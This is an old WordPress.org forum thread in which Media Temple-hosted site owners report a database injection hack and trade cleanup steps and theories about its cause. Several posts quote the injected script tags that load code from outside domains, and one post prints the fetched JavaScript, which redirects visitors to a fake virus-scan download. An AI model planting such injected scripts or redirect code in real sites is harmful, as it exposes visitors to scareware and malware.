WordPress.org

Forums

Media Temple oeaou hack (72 posts)

  1. greenhoe
    Member
    Posted 5 years ago #

    Hi,
    I looked in one of my pages today and now all of a sudden all my pages and posts have <script src="http://ue.oeaou.com/31"></script> when you view the page in the HTML.

    Was my site hacked or was this put in here by a plugin?

  2. rutlo
    Member
    Posted 5 years ago #

    I got the same thing. What plugins do you use? Maybe we have some of the same ones.

  3. Ankantoiel
    Member
    Posted 5 years ago #

    I have the same problem on several sites. I have checked the plugins I use, but they are different on the installations.

  4. mediosia
    Member
    Posted 5 years ago #

    Well, I had the same problem. MediaTemple is my hosting provider, and they help me out with this. This is a WordPress Redirect Exploit hack that put a line of code on your database table wp_posts and wp_cats_posts

    The line that is put by the hack in your wp_posts and wp_cats_posts can be one of these or similar

    <script src="http://ae.awaue.com/7"></script>
    <script src="http://ue.oeaou.com/31"></script>
    <script src="http://ie.eracou.com/3"></script>
    <script src="http://ao.euuaw.com/9"></script>

    You must delete all of these lines

    Symptoms
    * Visitors viewing posts on your blog may be redirected to third-party sites.
    * Visitors may also be redirected to qooglesearch.com, which has already been disabled.

    Clean-Up

    Search in your database (specially in "wp_posts" and "wp_cats_posts" tables for strings like these and delete it.

    Info take it from: http://wiki.mediatemple.net/w/WordPress_Redirect_Exploit

    I don't know if maybe some plugin is doing these. I have the following plugins, let me know if you have the same or wich one do you have:

    Adminimize
    Akismet
    cforms
    Cleanup WordPress
    Google Analyticator
    Google News Sitemap
    Google XML Sitemaps
    HeadSpace2
    Insights
    jQuery Lightbox For Native Galleries
    MobilePress
    Podcasting Plugin by TSG
    Post Tabs
    Really Simple CAPTCHA
    Revision Control
    SEO Friendly Images
    WordPress.com Stats
    WP-PageNavi
    WP-UserOnline
    WP Geo
    ZD YouTube FLV Player

  5. Ankantoiel
    Member
    Posted 5 years ago #

    Ah thanks for the reply. My sites are also hosted on a mediatemple server. So I will try now their solution.

  6. jjwright85
    Member
    Posted 5 years ago #

    I've noticed the same problem on a few Media Template WordPress websites this morning. The fix above from Media Templates site ended up fixing it.

  7. thekmen
    Member
    Posted 5 years ago #

    Same problem here today on MediaTemplae.
    The <script src= is also inserted into media attachment descriptions, so make sure to clean those too.

  8. locality
    Member
    Posted 5 years ago #

    Is it strange that everyone that is having a problem is using MediaTemple? I just noticed the same thing today.

    Here are the plugins I am using:
    Akismet
    All in One Favicon
    Announcement and Vertical Scroll News
    BM Custom Login
    Constant Contact API
    Kimili Flash Embed
    Store Locator

    It looks like only Akismet is in common with you, Mediosia. I am trying to fix it on my database, but phpMyAdmin will not let me login. MediaTemple is working on it, but at this point, I'm thinking about switching hosting. I have lots of other WordPress sites and never had this problem with different hosts.

  9. qbradley
    Member
    Posted 5 years ago #

    Count me in. Found it on mine too.
    And I'm on media temple.

    <script src="http://ue.oeaou.com/31"></script>

    This redirects people to a "Virus Scan" and asks them to download the "fix"

  10. qbradley
    Member
    Posted 5 years ago #

    WOW!
    Now I just have a big fat "Error establishing a database connection" on my home page.

  11. qbradley
    Member
    Posted 5 years ago #

    I went through the cleanup process as mentioned by mediosia
    I'm good to go for now

  12. mrmist
    Forum Janitor
    Posted 5 years ago #

    Seems to be a media temple issue, will sticky this for now.

    http://codex.wordpress.org/FAQ_My_site_was_hacked has some info on what to do in the event of hacks, as well as referencing the above posts.

  13. thekmen
    Member
    Posted 5 years ago #

    fixed here too by removing all mentions via sql, but what a nightmare, esp is you have a few databases & multiple installs.

  14. iso50
    Member
    Posted 5 years ago #

    On Mediatemple too. Called and they cleaned the DBs. As for plugs, the only ones I have in common with Mediosia are as follows:

    Akismet
    WP-Stats
    WP-Pagenavi

  15. thekmen
    Member
    Posted 5 years ago #

    @iso50 damn, they didn't clean my DBs, just sent me links on how to do it my self & more or less said it's not their problem.

  16. sandnsurf
    Member
    Posted 5 years ago #

    Same again
    Also on WordPress hosted by MediaTemple
    The only ones I have in common is

    Akismet
    WP-Stats

    Hopefully be able to clean up the database as per mediatemple suggestion...not the first time the MediaTemple blog has fallen over, whilst all the other hosting servers remain solid!

  17. EthanCaine
    Member
    Posted 5 years ago #

    Akismet is the only common plugin between all of us and since it comes DEFAULT with wordpress I'm not sure we should be blaming it.

    Even my obscure blogs that have no traffic going to them with only a default wordpress install got hacked.

    The IP addresses are pointing to LATVIA...those damn Latvians.

    Anyone have any idea how those Latvians gained access to our MediaTemple accounts?

  18. virtualimpax
    Member
    Posted 5 years ago #

    I'm with Ethan - it looks like the common denominator here is the host - not a plugin.

    I have a WP blog hosted with MT - ran the SQL query and I'm clean - for now! (Thanks for the link MrMist!)

    I had to double check to make certain this thread wasn't dated BEFORE the big "database clean up" project from last April - when they went in and changed the USER ID and Passwords to improve security.

    The $64,000 question is - is my blog "clean" because they updated my DB info or is it just because the hackers haven't found my blog yet?

  19. entilza72
    Member
    Posted 5 years ago #

    I agree, I think it is the host. I too run WP on mt and I had the same hack.

    I cleaned the site as per the instructions.

    A few hours later I checked my site again, and it had the same redirect. I checked the db again and lo - it was hacked again (either that, or the first round cleaning was not successful despite me checking). Cleaned again.

    This begs the question. How is this happening? No information is available.

    We are not seeing it on other hosts, so I am guessing this is an exploit due to Media Temple's setup. I am guessing the exposure is occuring on the database, not via the WP application.

    Cheers,
    Entilza

  20. rgbk
    Member
    Posted 5 years ago #

    this is NUTS
    how can either WP or MT be having this?
    Can someone help me understand why it would be MT and not WP, or visa versa?

    I pay a lot to MT and it seems they have had these hacking issues more then once.
    I'm on MT too, their grid service.

  21. rgbk
    Member
    Posted 5 years ago #

    Any of you using vimeo on your site?
    I'm using vimeo as flash and as jquery built video (needed to control volume on some of the autoplaying videos)

    I dont use askimet, deleted it, and dont share the same plugins listed in this forum.

  22. rgbk
    Member
    Posted 5 years ago #

    that url http://ue.oeaou.com/31 takes me to this script:

    function toloveyes(alwayslovers,value,tobelove){
    	var exdate=new Date();
    	exdate.setDate(exdate.getDate()+tobelove);
    	document.cookie=alwayslovers+ "=" +escape(value)+
    	((tobelove==null) ? "" : ";expires="+exdate.toGMTString());
    }
    
    function getCookie(alwayslovers){
    if (document.cookie.length>0)
      {
      cstatr=document.cookie.indexOf(alwayslovers + "=");
      if (cstatr!=-1)
        {
        cstatr=cstatr + alwayslovers.length+1;
        olalala=document.cookie.indexOf(";",cstatr);
        if (olalala==-1) olalala=document.cookie.length;
        return unescape(document.cookie.substring(cstatr,olalala));
        }
      }
    return "";
    }
    
    var name=getCookie("pma_visited_theme2");
    if (name==""){
    	toloveyes("pma_visited_theme2","1",20);
    	var url="http://e.auoo.info/in2.php?n=508102";
    	window.top.location.replace(url);
    }else{
    
    }
  23. rgbk
    Member
    Posted 5 years ago #

    If you google that pma_visited_theme2 you get this:

    http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=pma_visited_theme2

  24. entilza72
    Member
    Posted 5 years ago #

    rgbk, it's simple:

    If it was a plug-in, or wordpress, or any other common object, then we would be seeing this on other hosts too.

    No one is reporting this issue on any other host.

    Only Media Temple GS (Grid Service) customers are complaining. I think that pretty clearly points the finger at a vulnerability directly related to that host. Try googling for more info (as I did) and you will find very little info, except pointing to media temple's site, blogs/tweets from media temple users, and this thread.

    I suspect customer databases are being manipulated without using wordpress (ie: the exploit is not occuring via wordpress), although I do note with great suspicion that all my wp php files were altered on 31 July. Possibly that was the WP 3.0.1 update though.

    Cheers,
    Entilza

  25. traversal
    Member
    Posted 5 years ago #

    I have this issue on every single site I look after on MediaTemple GS too. Bummer. Did anyone else notice that their WordPress sites slowed to a CRAWL for a few hours mid-way through last week? My guess is that this is when the attack took place.

  26. khawkins98
    Member
    Posted 5 years ago #

    Happened to a few folks that run sites on my GS w/ version 2.9 and 3.0.

    And the 3.0 uses only the Akismet, Pagebar2, Viper's Video Quicktags, and WP-Walla plugins.

    This SQL query helped clean nicely
    UPDATE wp_posts SET post_content = replace( post_content, '<script src="http://ao.euuaw.com/9"></script>', ' ')

    @entilza72 The hack didn't affect the timestamps of wp-*.php files.

  27. rgbk
    Member
    Posted 5 years ago #

    Are you guys getting a response from MT?
    I find it shocking that i sent them a support query yesterday and 24 hours still nothing?
    They aren't cheap either. I mean why arent they jumping on this issue? I sent them this forum discussion and everything.

    Btw i didn't update to 3.01.

  28. UseShots
    Member
    Posted 5 years ago #

    Hi,

    There have been many similar problems on MediaTemple lately. Can you check permissions of wp-config.php and report them here?

    This file contains mySql passwords in clear text and should not be world-readable. Otherwise, anyone from neighbor accounts can gain access to you WordPress database and modify it however they want to.

  29. brent3721
    Member
    Posted 5 years ago #

    also using mediatemple grid server, we are in spain at the moment, maybe people can report their geographic location, I doubt that matters, but you never know.

  30. entilza72
    Member
    Posted 5 years ago #

    @UseShots - mine was world read. Not good practice, but I believe these servers are jailed and it is not possible for a user to cd into your file structure, or read a file if they know where it is. I have changed to my local user rw (rw---- or 500) just in case.

    @rgbk - it occured with my 3.0.1 site. I logged a job over 24 hrs ago. The official line over a day ago was this was a WordPress exploit, not an mt problem. Clearly, that is incorrect.

    @khawkins98 - yeah, I figure I updated to 3.0.1 on that date.

    @traversal - my mt wp site has been crawling since day one. Often can take up to 10 seconds to begin serving. Strangely, non-wp content can begin serving in around 2 seconds.

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags

No tags yet.